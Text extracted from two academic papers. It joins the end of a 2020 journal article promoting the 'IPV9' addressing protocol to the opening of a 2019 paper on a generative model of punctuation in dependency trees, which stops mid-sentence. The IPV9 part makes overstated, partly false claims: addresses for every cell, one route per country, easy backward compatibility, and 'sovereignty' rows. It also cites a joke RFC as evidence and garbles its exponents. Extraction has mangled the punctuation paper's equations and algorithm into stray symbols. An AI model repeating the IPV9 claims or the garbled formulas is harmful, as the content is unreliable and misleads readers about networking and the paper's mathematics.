seven times of "non-final rejection opinion" and six final rejections by the US Patent Office. During this period, it was repeatedly criticized by senior members of the US IETF and famous American IT companies. In December 2011, the US Patent and Trademark Office officially issued a patent certificate numbered US 8,082,365, and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. In December 2011, the US Patent and Trademark Office officially issued a patent certificate numbered US 8,082,365, and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". III. SPECIAL CHARACTERISTICS OF IPV9 1) Address space is huge IPV9 has a larger address space than IPv4/IPv6. IPv4 defines the bit length of IP address is 32, that is, there are 232-1 addresses; While the length of IPv6 is 128, that is, 2128-1 addresses, the standard length of an IPV9 address is 2256-1, with 42 layers address structure design will be 10256-1 (21024-1). To put it mildly, if IPv6 were widely used, every grain of sand in the world would have an IP address. Then after IPV9 is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. It is no exaggeration to say that if IPV9 is fully applied, every cell and living gene in the world can be assigned to an IPV9 address. Layer 42 is the asset management address (including legal digital currency space) compatible with ean-ucc128 barcode length. 2) Route tables are smaller International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 32 IPv6 has a smaller routing table than IPv4. The address allocation of IPv6 follows the principle of Aggregation at the beginning, which enables the router to represent a subnet with an Entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. The routing table of IPV9 is very small, and the address allocation of IPV9 follows the principle of Geo-spatial clustering from the beginning, which enables IPV9 router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. At the same time, this subnet can express a specific geographical location, for example, we assign the IPV9 address segment of Shanghai as 86[21[5]/96, then in other routers of the same level, only one route pointing to the address segment of 86[21[5]/96 can realize the IPv9 address routing of Shanghai. According to this logic, only one route is needed from country to country. For example, the route to China is 86/64. The IPv4 routing table is large and irregular, and the IPv6 routing table is smaller than IPv4, but the IPv6 routing table contains no geographic information and the routing is messy. 3) Automatic configuration support IPV9 adds support for automatic configuration of variable length addresses, which is an improvement and extension of DHCP protocol of IPV9, making network management more convenient. IPV9 supports multicast, and supports the ISO/IEC C6 future network << naming and addressing >>TCP/IP/M model, and supports long packet code streams for virtual and real circuits. This allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the Internet than IPv6. 4) Address length could be select IPV9 address length has a variety of options, which can realize the change of 16, 32, 64, 128, 256, 512 and 1024 bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. 5) Dual encryption The address length of IPv9 is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. 6) Add location information to the address IPV9 addresses can be embedded with geo-location information, as well as personal and industry ID information, this making IP addresses uniquely tied to personal information. 7) Compatible with previous addresses IPV9 address is backward compatible with IPv4/IPv6 address. In order to absorb the upgrade difficulty of IPv6 incompatibility with IPv4, IPV9 protocol remains and unchanged, so that IPv4/IPv6 upgrade to the new version of IPV9, the upgrade cost is very low. 8) Sovereignty is different IPv4/IPv6 addresses Spaces and copyright ownership: United States. IPV9 address space and copyright ownership: China. IV. FEATURE OF IPV9 IPV9 technology has many features; a comparison of IPV9 and IPv4, IPv6 features is listed below. javascript:; International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 33 TABLE I. COMPARISON BETWEEN IPV4 AND IPV9 Item IPv4 IPV9 Bit length 32 256 Address format Dot decimal, uncompressible [ ] Bracket decimal notation, with zero compression, can be compressed on both sides Network express Mask or length prefix representation Length prefix express that supports public geographic space clustering Loop Address 127.0.0.1 [7]1 Public address Common public IP address Aggregate global address location unicast addresses Automatic configuration Automatically configured address （169.254.0.0/16） Link-Local Address:4269801472[0/64 Broadcast address Contains broadcast address No broadcast address, transitional support broadcast address Unspecified address 0.0.0.0 [8] Domain name resolution IPv4 Host address(A) resource record IPv9 host address (AAAAAAAA) resource record Mother root server space 32bits (232-1 addresses) Realized 256bits (2256-1 addresses) design objective 2048bits Root domain server name 13 letters from A to M 13 letters from N to Z China top-level domain .CN .CHN Inverse Resolution IN-ADDR.APRA Domain IN-ADDR.APRA9 Domain Compatibility 1 Incompatible with IPv6 addresses Compatible IPv6 address：y]y]y]y]x:x:x:x:x:x:d.d.d.d Compatibility 2 Incompatible with IPV9 addresses Compatible IPv4 address：y]y]y]y]y]y]y]d.d.d.d Transition address No Transition address IPv4：[7]d.d.d.d 简写 J.J.J.J Encryption No IP address encryption Dual encrypted of the source address and the destination address Address length Fixed 32 bits Not fixed，canbe16、32、64、128、256、512、1024bits Geographic information No geographic location information Geographic location information Can be embedded DHCP Nonsupport DHCP Added support for automatic configuration of variable - length addresses ISO/IEC C6 & TCP/IP/M model Not supported Supported Communication rules Communicate first, then verify Verify before communication Network model TCP/IP TCP/IP/M Sovereign America China International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 34 TABLE II. COMPARISONS BETWEEN IPV6 AND IPV9 Item IPv6 IPV9 Bit length 128 256 Address format Colon-separated hexadecimal with zero compression, single compression [ ] [ ] Bracket decimal notation, with zero compression, can be compressed on both sides Network express Mask or length prefix representation Length prefix express that supports public geographic space clustering Loop Address ：：1 [7]1 Public address Can aggregate the global single point transmission address Aggregate global address location unicast addresses Link-Local Address FE80：：/64 4269801472[0/64 Broadcast address No No broadcast address, transitional support broadcast address Unspecified address 0: 0: 0: 0: 0: 0: 0: 0: 0 [8] Domain name resolution IPv6 Host address(AAAA) resource record IPv9 host address (AAAAAAAA) resource record Mother root server space 128bits (2128-1 addresses) Realized 256bits (2256-1 addresses) design objective 2048 bits Root domain server name 13 letters from A to M 13 letters from N to Z China top-level domain .CN .CHN Inverse Resolution IP6.INT Domain IN-ADDR.APRA9 Domain Compatibility 1 Incompatible with IPv9 addresses Compatible IPv6 address：y]y]y]y]x:x:x:x:x:x:d.d.d.d Compatibility 2 Incompatible with IPv4 addresses Compatible IPv4 address：y]y]y]y]y]y]y]d.d.d.d Transition address No Transition address IPv4：[7]d.d.d.d 简写 J.J.J.J Encryption No IP address encryption Dual encrypted of the source address and the destination address Address length Fixed 128 bits Not fixed，canbe16、32、64、128、256、512、1024bits Geographic information No geographic location information Geographic location information Can be embedded DHCP Support DHCP, no automatic configuration for variable-length addresses Added support for automatic configuration of variable - length addresses Network model TCP/IP TCP/IP/M ISO/IEC C6 & TCP/IP/M mode Not supported Supported Communication rule Communicate first, then verify Verify before communication Network model TCP/IP TCP/IP/M Sovereign America China International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 35 V. CONCLUSIONS The IPV9 protocol uses 0-9 Arabic digital network as the virtual IP address and uses decimal as the text representation method, which is a convenient way to find online users. IPV9 has a large number of assignable IP addresses, and the maximum number of address bits is 2 × 1048 In order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. At the same time, IPV9 is also called "New Generation Security and Reliable Information Integrated Network Protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. IPV9 technology and the whole network architecture make China to be the second country in the world with complete future network architecture. This paper introduces the generation process and characteristics of IPV9, and compared with the existing Internet, with the continuous optimization and improvement of IPV9 Future Network, it will be applied in many other countries. REFERENCES [1] Xie Jianping etc.Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [2] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [3] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. [4] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [5] Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [6] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [7] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06 [8] Soliman H., Castelluccia C., Malki K. E., Bellier L. Hierarchical Mobile IPv6 (HMIPv6) [9] Johnson D., Perkins C., Arkko J. Mobility Support in IPv6,” RFC 3775, June 2004. [10] Perkins C.E. IP Mobility Support for IPv4”, IETF RFC 3220, Jan. 2002 [11] Farinacci D., Fuller V., Meyer D., Lewis D. Interworking LISP with IPv4 and IPv6”, draft-ietf- lisp-interworking-01, Aug. 2010 [12] Meyer K.F.D., & Zhang L. RFC 4984: Report from the IAB Workshop on Routing and Addressing, September 2007. [13] Dommety G., & Jain R. Potential networking applications of global positioning systems (GPS), Technical report TR-24, The Ohio State University (1996). [14] Recommendation ITU-T Y. 3031 Identification framework in future networks [15] ITU-T Y.2057 (2011), Framework of node identifier and locator separation in IPv6-based next generation networks [16] ITU-T Y.2720 (2009), NGN identity management framework [17] ITU-T Y.3031 (2012), Identification Framework in Future Networks [18] IETF RFC 4140, Hierarchical Mobile Ipv6 Mobility Management (HMIPv6) [19] IETF RFC 3403 (2002), The Naming Authority Pointer (NAPTR) DNS Resource Record work_v3azwvbzizhhznkwmikacudzji ---- Transactions of the Association for Computational Linguistics, vol. 7, pp. 357–373, 2019. Action Editor: Trevor Cohn. Submission batch: 10/2018; Revision batch: 1/2019; Published 7/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. A Generative Model for Punctuation in Dependency Trees Xiang Lisa Li⇤ and Dingquan Wang⇤ and Jason Eisner Department of Computer Science, Johns Hopkins University xli150@jhu.edu, {wdd,jason}@cs.jhu.edu Abstract Treebanks traditionally treat punctuation marks as ordinary words, but linguists have suggested that a tree’s “true” punctuation marks are not observed (Nunberg, 1990). These latent “underlying” marks serve to delimit or separate constituents in the syn- tax tree. When the tree’s yield is rendered as a written sentence, a string rewriting mech- anism transduces the underlying marks into “surface” marks, which are part of the ob- served (surface) string but should not be re- garded as part of the tree. We formalize this idea in a generative model of punc- tuation that admits efficient dynamic pro- gramming. We train it without observing the underlying marks, by locally maximiz- ing the incomplete data likelihood (simi- larly to the EM algorithm). When we use the trained model to reconstruct the tree’s underlying punctuation, the results appear plausible across 5 languages, and in par- ticular are consistent with Nunberg’s anal- ysis of English. We show that our gener- ative model can be used to beat baselines on punctuation restoration. Also, our recon- struction of a sentence’s underlying punctu- ation lets us appropriately render the surface punctuation (via our trained underlying-to- surface mechanism) when we syntactically transform the sentence. 1 Introduction Punctuation enriches the expressiveness of writ- ten language. When converting from spoken to written language, punctuation indicates pauses or pitches; expresses propositional attitude; and is conventionally associated with certain syntactic constructions such as apposition, parenthesis, quo- tation, and conjunction. In this paper, we present a latent-variable model of punctuation usage, inspired by the rule- based approach to English punctuation of Nun- berg (1990). Training our model on English data ⇤Equal contribution. learns rules that are consistent with Nunberg’s hand-crafted rules. Our system is automatic, so we use it to obtain rules for Arabic, Chinese, Spanish, and Hindi as well. Moreover, our rules are stochastic, which al- lows us to reason probabilistically about ambigu- ous or missing punctuation. Across the 5 lan- guages, our model predicts surface punctuation better than baselines, as measured both by per- plexity (§4) and by accuracy on a punctuation restoration task (§ 6.1). We also use our model to correct the punctuation of non-native writers of English (§ 6.2), and to maintain natural punc- tuation style when syntactically transforming En- glish sentences (§ 6.3). In principle, our model could also be used within a generative parser, al- lowing the parser to evaluate whether a candidate tree truly explains the punctuation observed in the input sentence (§8). Punctuation is interesting In The Linguistics of Punctuation, Nunberg (1990) argues that punctu- ation (in English) is more than a visual counter- part of spoken-language prosody, but forms a lin- guistic system that involves “interactions of point indicators (i.e. commas, semicolons, colons, pe- riods and dashes).” He proposes that much as in phonology (Chomsky and Halle, 1968), a gram- mar generates underlying punctuation which then transforms into the observed surface punctuation. Consider generating a sentence from a syntactic grammar as follows: Hail the king [, Arthur Pendragon ,] [, who wields [ “ Excalibur ” ] ,] . Although the full tree is not depicted here, some of the constituents are indicated with brackets. In this underlying generated tree, each appositive NP is surrounded by commas. On the surface, however, the two adjacent commas after Pendragon will now be collapsed into one, and the final comma will be absorbed into the adjacent period. Fur- thermore, in American English, the typographic 357 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 convention is to move the final punctuation inside the quotation marks. Thus a reader sees only this modified surface form of the sentence: Hail the king, Arthur Pendragon, who wields “Excalibur.” Note that these modifications are string transfor- mations that do not see or change the tree. The resulting surface punctuation marks may be clues to the parse tree, but (contrary to NLP convention) they should not be included as nodes in the parse tree. Only the underlying marks play that role. Punctuation is meaningful Pang et al. (2002) use question and exclamation marks as clues to sentiment. Similarly, quotation marks may be used to mark titles, quotations, reported speech, or dubious terminology (University of Chicago, 2010). Because of examples like this, methods for determining the similarity or meaning of syntax trees, such as a tree kernel (Agarwal et al., 2011) or a recursive neural network (Tai et al., 2015), should ideally be able to consider where the un- derlying punctuation marks attach. Punctuation is helpful Surface punctuation re- mains correlated with syntactic phrase structure. NLP systems for generating or editing text must be able to deploy surface punctuation as human writ- ers do. Parsers and grammar induction systems benefit from the presence of surface punctuation marks (Jones, 1994; Spitkovsky et al., 2011). It is plausible that they could do better with a linguisti- cally informed model that explains exactly why the surface punctuation appears where it does. Pat- terns of punctuation usage can also help identify the writer’s native language (Markov et al., 2018). Punctuation is neglected Work on syntax and parsing tends to treat punctuation as an af- terthought rather than a phenomenon governed by its own linguistic principles. Treebank annota- tion guidelines for punctuation tend to adopt sim- ple heuristics like “attach to the highest possi- ble node that preserves projectivity” (Bies et al., 1995; Nivre et al., 2018).1 Many dependency parsing works exclude punctuation from evalua- tion (Nivre et al., 2007b; Koo and Collins, 2010; Chen and Manning, 2014; Lei et al., 2014; Kiper- wasser and Goldberg, 2016), although some others retain punctuation (Nivre et al., 2007a; Goldberg and Elhadad, 2010; Dozat and Manning, 2017). 1http://universaldependencies.org/u/ dep/punct.html Unpunctuated Tree: T Dale means river valley rootnsubj dobj ATTACH tree: T 0 Underlying sequence: u sentence: ū Surface sentence: x̄sequence: x NOISYCHANNEL u0 u1 u2 u3 u4 x0 x1 x2 x3 x4 “ Dale ” means “ river valley ” . “ Dale ” means “ river valley . ” root. nsubj“ ” dobj“ ” Figure 1: The generative story of a sentence. Given an unpunctuated tree T at top, at each node w 2 T , the ATTACH process stochastically attaches a left puncteme l and a right puncteme r, which may be empty. The resulting tree T 0 has underlying punctua- tion u. Each slot’s punctuation ui 2 u is rewritten to xi 2 x by NOISYCHANNEL. In tasks such as word embedding induction (Mikolov et al., 2013; Pennington et al., 2014) and machine translation (Zens et al., 2002), punctua- tion marks are usually either removed or treated as ordinary words (Řehůřek and Sojka, 2010). Yet to us, building a parse tree on a surface sentence seems as inappropriate as morphologi- cally segmenting a surface word. In both cases, one should instead analyze the latent underlying form, jointly with recovering that form. For exam- ple, the proper segmentation of English hoping is not hop-ing but hope-ing (with underlying e), and the proper segmentation of stopping is neither stopp-ing nor stop-ping but stop-ing (with only one underlying p). Cot- terell et al. (2015, 2016) get this right for morphol- ogy. We attempt to do the same for punctuation. 2 Formal Model We propose a probabilistic generative model of sentences (Figure 1): p(x̄) = P T,T 0psyn(T) · p✓(T 0 |T) · p�(x̄|ū(T 0)) (1) First, an unpunctuated dependency tree T is stochastically generated by some recursive pro- cess psyn (e.g., Eisner, 1996, Model C).2 Second, each constituent (i.e., dependency subtree) sprouts optional underlying punctuation at its left and right edges, according to a probability distribution p✓ that depends on the constituent’s syntactic role (e.g., dobj for “direct object”). This punctuated tree T 0 yields the underlying string ū = ū(T 0), which is edited by a finite-state noisy channel p� to arrive at the surface sentence x̄. 2Our model could be easily adapted to work on con- stituency trees instead. 358 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 http://universaldependencies.org/u/dep/punct.html http://universaldependencies.org/u/dep/punct.html This third step may alter the sequence of punc- tuation tokens at each slot between words—for ex- ample, in §1, collapsing the double comma , , between Pendragon and who. u and x denote just the punctuation at the slots of ū and x̄ respec- tively, with ui and xi denoting the punctuation to- ken sequences at the ith slot. Thus, the transfor- mation at the ith slot is ui 7! xi. Since this model is generative, we could train it without any supervision to explain the observed surface string x̄: maximize the likelihood p(x̄) in (1), marginalizing out the possible T, T 0 values. In the present paper, however, we exploit known T values (as observed in the “depunctuated” ver- sion of a treebank). Because T is observed, we can jointly train ✓, � to maximize just p(x | T) = X T 0 p✓(T 0 | T) · p�(x | u(T 0)) (2) That is, the psyn model that generated T be- comes irrelevant, but we still try to predict what surface punctuation will be added to T . We still marginalize over the underlying punctuation marks u. These are never observed, but they must explain the surface punctuation marks x (§ 2.2), and they must be explained in turn by the syntax tree T (§ 2.1). The trained generative model then lets us restore or correct punctuation in new trees T (§6). 2.1 Generating Underlying Punctuation The ATTACH model characterizes the probability of an underlying punctuated tree T 0 given its cor- responding unpunctuated tree T , which is given by p✓(T 0 | T) = Y w2T p✓(lw, rw | w) (3) where lw, rw 2 V are the left and right punctemes that T 0 attaches to the tree node w. Each puncteme (Krahn, 2014) in the finite set V is a string of 0 or more underlying punctuation tokens.3 The proba- bility p✓(l, r | w) is given by a log-linear model 3Multi-token punctemes are occasionally useful. For ex- ample, the puncteme ... might consist of either 1 or 3 to- kens, depending on how the tokenizer works; similarly, the puncteme ?! might consist of 1 or 2 tokens. Also, if a sin- gle constituent of T gets surrounded by both parentheses and quotation marks, this gives rise to punctemes (“ and ”). (A better treatment would add the parentheses as a separate puncteme pair at a unary node above the quotation marks, but that would have required T 0 to introduce this extra node.) 1. Point Absorption 3. Period Absorption „ 7!, ,. 7!. -, 7!- .? 7!? .! 7!! -; 7!; ;. 7!. abbv. 7!abbv 2. Quote Transposition 4. Bracket Absorptions ”, 7!,” ”. 7!.” ,) 7!) -) 7!) (, 7!( ,” 7!” “, 7!“ Table 1: Some of Nunberg’s punctuation interaction rules in English, in priority order. The absorption rules ensure that when there are two adjacent tokens, the “weaker” one is deleted (where the strength ordering is {?, !, (, ), “, ”} > . > {;, :} > - > ,), except that bracketing tokens such as () and “” do not absorb tokens outside the material they bracket. p✓(l, r|w) / ( exp ✓>f(l, r, w) if (l, r) 2 Wd(w) 0 otherwise (4) where V is the finite set of possible punctemes and Wd ✓ V2 gives the possible puncteme pairs for a node w that has dependency relation d = d(w) to its parent. V and Wd are estimated heuristically from the tokenized surface data (§4). f(l, r, w) is a sparse binary feature vector, and ✓ is the cor- responding parameter vector of feature weights. The feature templates in Appendix A4 consider the symmetry between l and r, and their compatibility with (a) the POS tag of w’s head word, (b) the de- pendency paths connecting w to its children and the root of T , (c) the POS tags of the words flank- ing the slots containing l and r, (d) surface punc- tuation already added to w’s subconstituents. 2.2 From Underlying to Surface From the tree T 0, we can read off the sequence of underlying punctuation tokens ui at each slot i between words. Namely, ui concatenates the right punctemes of all constituents ending at i with the left punctemes of all constituents starting at i (as illustrated by the examples in §1 and Figure 1). The NOISYCHANNEL model then transduces ui to a surface token sequence xi, for each i = 0, . . . , n independently (where n is the sentence length). Nunberg’s formalism Much like Chomsky and Halle’s (1968) phonological grammar of English, Nunberg’s (1990) descriptive English punctuation grammar (Table 1) can be viewed computationally as a priority string rewriting system, or Markov algorithm (Markov, 1960; Caracciolo di Forino, 1968). The system begins with a token string u. 4The appendices (supplementary material) are available at https://arxiv.org/abs/1906.11298. 359 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 https://arxiv.org/abs/1906.11298 abcde . ab 7! ab abcde . bc 7! b a bde . bd 7! db a dbe . be 7! e a d e Figure 2: Editing abcde 7! ade with a sliding win- dow. (When an absorption rule maps 2 tokens to 1, our diagram leaves blank space that is not part of the out- put string.) At each step, the left-to-right process has already committed to the green tokens as output; has not yet looked at the blue input tokens; and is currently considering how to (further) rewrite the black tokens. The right column shows the chosen edit. At each step it selects the highest-priority local rewrite rule that can apply, and applies it as far left as possible. When no more rules can apply, the final state of the string is returned as x. Simplifying the formalism Markov algorithms are Turing complete. Fortunately, Johnson (1972) noted that in practice, phonological u 7! x maps described in this formalism can usually be imple- mented with finite-state transducers (FSTs). For computational simplicity, we will formu- late our punctuation model as a probabilistic FST (PFST)—a locally normalized left-to-right rewrite model (Cotterell et al., 2014). The probabilities for each language must be learned, using gradient descent. Normally we expect most probabilities to be near 0 or 1, making the PFST nearly determin- istic (i.e., close to a subsequential FST). However, permitting low-probability choices remains useful to account for typographical errors, dialectal dif- ferences, and free variation in the training corpus. Our PFST generates a surface string, but the invertibility of FSTs will allow us to work back- wards when analyzing a surface string (§3). A sliding-window model Instead of having rule priorities, we apply Nunberg-style rules within a 2-token window that slides over u in a single left- to-right pass (Figure 2). Conditioned on the cur- rent window contents ab, a single edit is selected stochastically: either ab 7!ab (no change), ab 7!b (left absorption), ab 7! a (right absorption), or ab 7! ba (transposition). Then the window slides rightward to cover the next input token, together with the token that is (now) to its left. a and b are always real tokens, never boundary symbols. � specifies the conditional edit probabilities.5 5Rather than learn a separate edit probability distribution for each bigram ab, one could share parameters across bi- grams. For example, Table 1’s caption says that “stronger” tokens tend to absorb “weaker” ones. A model that incor- These specific edit rules (like Nunberg’s) can- not insert new symbols, nor can they delete all of the underlying symbols. Thus, surface xi is a good clue to ui: all of its tokens must appear underly- ingly, and if xi = ✏ (the empty string) then ui = ✏. The model can be directly implemented as a PFST (Appendix D4) using Cotterell et al.’s (2014) more general PFST construction. Our single-pass formalism is less expressive than Nunberg’s. It greedily makes decisions based on at most one token of right context (“label bias”). It cannot rewrite ’”. 7!.’” or ”,. 7!.” because the . is encountered too late to percolate leftward; luckily, though, we can handle such En- glish examples by sliding the window right-to-left instead of left-to-right. We treat the sliding direc- tion as a language-specific parameter.6 2.3 Training Objective Building on equation (2), we train ✓, � to lo- cally maximize the regularized conditional log- likelihood ⇣ X x,T log p(x | T)� ⇠ · E T 0 [c(T 0)]2 ⌘ � & · ||✓||2 (5) where the sum is over a training treebank.7 The expectation E[· · · ] is over T 0 ⇠ p(· | T, x). This generalized expectation term pro- vides posterior regularization (Mann and McCal- lum, 2010; Ganchev et al., 2010), by encourag- ing parameters that reconstruct trees T 0 that use symmetric punctuation marks in a “typical” way. The function c(T 0) counts the nodes in T 0 whose punctemes contain “unmatched” symmetric punc- tuation tokens: for example, ) is “matched” only when it appears in a right puncteme with ( at the comparable position in the same constituent’s left puncteme. The precise definition is given in Ap- pendix B.4 porated this insight would not have to learn O(|⌃|2) separate absorption probabilities (two per bigram ab), but only O(|⌃|) strengths (one per unigram a, which may be regarded as a 1-dimensional embedding of the punctuation token a). We figured that the punctuation vocabulary ⌃ was small enough (Table 2) that we could manage without the additional com- plexity of embeddings or other featurization, although this does presumably hurt our generalization to rare bigrams. 6We could have handled all languages uniformly by mak- ing � 2 passes of the sliding window (via a composition of � 2 PFSTs), with at least one pass in each direction. 7In retrospect, there was no good reason to square the ET 0[c(T 0)] term. However, when we started redoing the ex- periments, we found the results essentially unchanged. 360 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 https://arxiv.org/abs/1906.11298 https://arxiv.org/abs/1906.11298 In our development experiments on English, the posterior regularization term was necessary to dis- cover an aesthetically appealing theory of under- lying punctuation. When we dropped this term (⇠ = 0) and simply maximized the ordinary regu- larized likelihood, we found that the optimization problem was underconstrained: different training runs would arrive at different, rather arbitrary un- derlying punctemes. For example, one training run learned an ATTACH model that used underlying “. to terminate sentences, along with a NOISY- CHANNEL model that absorbed the left quotation mark into the period. By encouraging the under- lying punctuation to be symmetric, we broke the ties. We also tried making this a hard constraint (⇠ = 1), but then the model was unable to explain some of the training sentences at all, giving them probability of 0. For example, I went to the “ special place ” cannot be explained, be- cause special place is not a constituent.8 3 Inference In principle, working with the model (1) is straightforward, thanks to the closure properties of formal languages. Provided that psyn can be en- coded as a weighted CFG, it can be composed with the weighted tree transducer p✓ and the weighted FST p� to yield a new weighted CFG (similarly to Bar-Hillel et al., 1961; Nederhof and Satta, 2003). Under this new grammar, one can recover the opti- mal T, T 0 for x̄ by dynamic programming, or sum over T, T 0 by the inside algorithm to get the likeli- hood p(x̄). A similar approach was used by Levy (2008) with a different FST noisy channel. In this paper we assume that T is observed, al- lowing us to work with equation (2). This cuts the computation time from O(n3) to O(n).9 Whereas the inside algorithm for (1) must consider O(n2) possible constituents of x̄ and O(n) ways of build- ing each, our algorithm for (2) only needs to iterate over the O(n) true constituents of T and the 1 true way of building each. However, it must still con- sider the |Wd| puncteme pairs for each constituent. 8Recall that the NOISYCHANNEL model family (§ 2.2) requires the surface “ before special to appear under- lyingly, and also requires the surface ✏ after special to be empty underlyingly. These hard constraints clash with the ⇠ = 1 hard constraint that the punctuation around special must be balanced. The surface ” after place causes a similar problem: no edge can generate the match- ing underlying “. 9We do O(n) multiplications of N ⇥ N matrices where Algorithm 1 The algorithm for scoring a given (T, x) pair. The code in blue is used during train- ing to get the posterior regularization term in (5). Input: T , x . Training pair (omits T 0, u) Output: p(x | T), E[c(T 0)] 1: procedure TOTALSCORE(T , x) 2: for i = 1 to n do 3: compute WFSA (Mi, �i, ⇢i) 4: E 0 . exp. count of unmatched punctemes 5: procedure IN(w) . w 2 T 6: i, k slots at left, right of w constit 7: j slot at right of w headword 8: Mleft ( Q w02leftkids(w) IN(w 0))⇢j�1 9: Mright �>j ( Q w02rightkids(w) IN(w 0)) 10: M0 Mleft · 1 · Mright . RNj⇥1, R1⇥Nj 11: M 0 . RNi⇥Nk 12: for (l, r) 2 Wd(w) do 13: p p✓(l, r | w) 14: M M + p · Mi(l)M0Mk(r) 15: E E + p · l,r have unmatched punc 16: return M . RNi⇥Nk 17: Mroot IN(root(T)) 18: return �>0 Mroot⇢n, E . R, R 3.1 Algorithms Given an input sentence x̄ of length n, our job is to sum over possible trees T 0 that are consistent with T and x̄, or to find the best such T 0. This is roughly a lattice parsing problem—made easier by knowing T . However, the possible ū values are characterized not by a lattice but by a cyclic WFSA (as |ui| is unbounded whenever |xi| > 0). For each slot 0  i  n, transduce the sur- face punctuation string xi by the inverted PFST for p� to obtain a weighted finite-state automa- ton (WFSA) that describes all possible underly- ing strings ui.10 This WFSA accepts each pos- sible ui with weight p�(xi | ui). If it has Ni states, we can represent it (Berstel and Reutenauer, 1988) with a family of sparse weight matrices Mi(�) 2 RNi⇥Ni , whose element at row s and column t is the weight of the s ! t arc labeled with �, or 0 if there is no such arc. Additional vectors �i, ⇢i 2 RNi specify the initial and final weights. (�i is one-hot if the PFST has a single N = O(# of punc types · max # of punc tokens per slot). 10Constructively, compose the u-to-x PFST (from the end of § 2.2) with a straight-line FSA accepting only xi, and project the resulting WFST to its input tape (Pereira and Ri- ley, 1996), as explained at the end of Appendix D. 361 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 initial state, of weight 1.) For any puncteme l (or r) in V, we define Mi(l) = Mi(l1)Mi(l2) · · · Mi(l|l|), a product over the 0 or more tokens in l. This gives the total weight of all s !⇤ t WFSA paths labeled with l. The subprocedure in Algorithm 1 essentially extends this to obtain a new matrix IN(w) 2 RNi⇥Nk , where the subtree rooted at w stretches from slot i to slot k. Its element IN(w)st gives the total weight of all extended paths in the ū WFSA from state s at slot i to state t at slot k. An extended path is defined by a choice of underly- ing punctemes at w and all its descendants. These punctemes determine an s-to-final path at i, then initial-to-final paths at i+1 through k�1, then an initial-to-t path at k. The weight of the extended path is the product of all the WFSA weights on these paths (which correspond to transition prob- abilities in p� PFST) times the probability of the choice of punctemes (from p✓). This inside algorithm computes quantities needed for training (§ 2.3). Useful variants arise via well-known methods for weighted derivation forests (Berstel and Reutenauer, 1988; Goodman, 1999; Li and Eisner, 2009; Eisner, 2016). Specifically, to modify Algorithm 1 to maximize over T 0 values (§§ 6.2–6.3) instead of summing over them, we switch to the derivation semiring (Goodman, 1999), as follows. Whereas IN(w)st used to store the total weight of all extended paths from state s at slot i to state t at slot j, now it will store the weight of the best such extended path. It will also store that extended path’s choice of un- derlying punctemes, in the form of a puncteme- annotated version of the subtree of T that is rooted at w. This is a potential subtree of T 0. Thus, each element of IN(w) has the form (r, D) where r 2 R and D is a tree. We define addition and multiplication over such pairs: (r, D) + (r0, D0) = ( (r, D) if r > r0 (r0, D0) otherwise (6) (r, D) · (r0, D0) = (rr0, DD0) (7) where DD0 denotes an ordered combination of two trees. Matrix products UV and scalar-matrix products p · V are defined in terms of element ad- dition and multiplication as usual: (UV)st = P rUsr · Vrt (8) (p · V)st = p · Vst (9) What is DD0? For presentational purposes, it is convenient to represent a punctuated dependency tree as a bracketed string. For example, the under- lying tree T 0 in Figure 1 would be [ [“ Dale ”] means [“ [ river ] valley ”] ] where the words correspond to nodes of T . In this case, we can represent every D as a partial bracketed string and define DD0 by string concatenation. This presentation ensures that multiplication (7) is a complete and associative (though not commutative) operation, as in any semiring. As base cases, each real-valued element of Mi(l) or Mk(r) is now paired with the string [l or r] respectively,11 and the real number 1 at line 10 is paired with the string w. The real-valued elements of the �i and ⇢i vectors and the 0 matrix at line 11 are paired with the empty string ✏, as is the real number p at line 13. In practice, the D strings that appear within the matrix M of Algorithm 1 will always represent complete punctuated trees. Thus, they can actu- ally be represented in memory as such, and differ- ent trees may share subtrees for efficiency (using pointers). The product in line 10 constructs a ma- trix of trees with root w and differing sequences of left/right children, while the product in line 14 annotates those trees with punctemes l, r. To sample a possible T 0 from the derivation for- est in proportion to its probability (§ 6.1), we use the same algorithm but replace equation (6) with (r, D) + (r0, D0) = ( (r + r0, D) if u < rr+r0 (r + r0, D0) otherwise with u ⇠ Uniform(0, 1) being a random number. 3.2 Optimization Having computed the objective (5), we find the gradient via automatic differentiation, and opti- mize ✓, � via Adam (Kingma and Ba, 2014)—a variant of 